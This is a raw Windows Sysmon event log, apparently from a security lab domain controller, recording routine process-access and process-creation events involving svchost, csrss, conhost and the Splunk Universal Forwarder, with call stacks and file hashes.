13:55:53.293{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007127Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.293{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007126Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.293{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007125Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.293{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007124Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.293{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007123Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.293{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-85E9-5FCF-2101-000000009101}4352C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007122Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.293{10ACEC4A-85E9-5FCF-2001-000000009101}44881256C:\Windows\system32\cmd.exe{10ACEC4A-85E9-5FCF-2101-000000009101}4352C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007121Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.303{10ACEC4A-85E9-5FCF-2101-000000009101}4352C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{10ACEC4A-85E9-5FCF-2001-000000009101}4488C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000007120Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.293{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85E9-5FCF-2001-000000009101}4488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007119Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.293{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007118Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.293{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007117Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.293{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007116Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.293{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007115Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.293{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007114Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.293{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007113Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.293{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007112Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.293{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007111Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.293{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007110Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.293{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85E9-5FCF-2001-000000009101}4488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007109Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.293{10ACEC4A-85E9-5FCF-1B01-000000009101}18404240C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-85E9-5FCF-2001-000000009101}4488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7d48|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007108Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.298{10ACEC4A-85E9-5FCF-2001-000000009101}4488C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007107Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.293{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007106Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.277{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-85E9-5FCF-1F01-000000009101}3136C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007105Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.277{10ACEC4A-853E-5FCF-0A00-000000009101}8521288C:\Windows\system32\services.exe{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007104Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.261{10ACEC4A-85E9-5FCF-1D01-000000009101}48121352C:\Windows\system32\conhost.exe{10ACEC4A-85E9-5FCF-1E01-000000009101}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007103Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.261{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007102Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.261{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007101Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.261{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007100Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 